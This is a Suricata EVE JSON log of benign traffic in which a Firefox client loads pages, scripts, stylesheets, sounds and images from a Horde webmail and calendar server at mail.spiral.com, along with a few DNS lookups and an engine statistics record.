{"timestamp":"2020-02-29T00:12:44.000246+0000","event_type":"stats","stats":{"uptime":14416,"capture":{"kernel_packets":135013,"kernel_drops":0},"decoder":{"pkts":135016,"bytes":93048265,"invalid":187,"ipv4":133525,"ipv6":8,"ethernet":135016,"raw":0,"null":0,"sll":0,"tcp":128245,"udp":5078,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2759,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2775,"synack":2766,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1800,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2319,"failed_udp":111},"tx":{"http":4629,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2399}},"flow_mgr":{"closed_pruned":2738,"new_pruned":15,"est_pruned":2365,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22411,"memcap_state":0,"memcap_global":0},"http":{"memuse":60014,"memcap":0}}} 
{"timestamp":"2020-02-29T00:12:44.002545+0000","flow_id":2246425387862493,"event_type":"flow","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":173,"bytes_toclient":283,"start":"2020-02-29T00:07:30.133597+0000","end":"2020-02-29T00:07:43.926789+0000","age":13,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:44.006850+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34113,"proto":"UDP","dns":{"type":"answer","id":54857,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.006850+0000","flow_id":1915120221140576,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34113,"proto":"UDP","dns":{"type":"answer","id":54857,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.001646+0000","flow_id":150206485572827,"event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":6}} 
{"timestamp":"2020-02-29T00:12:44.330105+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24489}} {"timestamp":"2020-02-29T00:12:44.348475+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24489},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.351218+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} 
{"timestamp":"2020-02-29T00:12:44.353979+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:12:44.398481+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":1}} {"timestamp":"2020-02-29T00:12:44.407268+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} 
{"timestamp":"2020-02-29T00:12:44.410082+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":2}} {"timestamp":"2020-02-29T00:12:44.411619+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:12:44.428156+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":3}} {"timestamp":"2020-02-29T00:12:44.430971+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":47195},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":4}} {"timestamp":"2020-02-29T00:12:44.449643+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:12:44.451037+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.451681+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:12:44.454644+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":1}} {"timestamp":"2020-02-29T00:12:44.456844+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:12:44.457400+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:12:44.457725+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":5}} {"timestamp":"2020-02-29T00:12:44.458784+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:12:44.479523+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":6}} {"timestamp":"2020-02-29T00:12:44.487927+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:12:44.489034+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":7}} {"timestamp":"2020-02-29T00:12:44.492155+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:12:44.492828+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":8}} 
{"timestamp":"2020-02-29T00:12:44.492847+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:12:44.493398+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:12:44.493548+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":2}} 
{"timestamp":"2020-02-29T00:12:44.494227+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":9}} {"timestamp":"2020-02-29T00:12:44.494337+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:12:44.494905+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":3}} {"timestamp":"2020-02-29T00:12:44.495681+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:12:44.496240+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:12:44.496257+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":10}} {"timestamp":"2020-02-29T00:12:44.496885+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:12:44.496897+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":4}} 
{"timestamp":"2020-02-29T00:12:44.497615+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":11}} {"timestamp":"2020-02-29T00:12:44.537309+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:12:44.545353+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} 
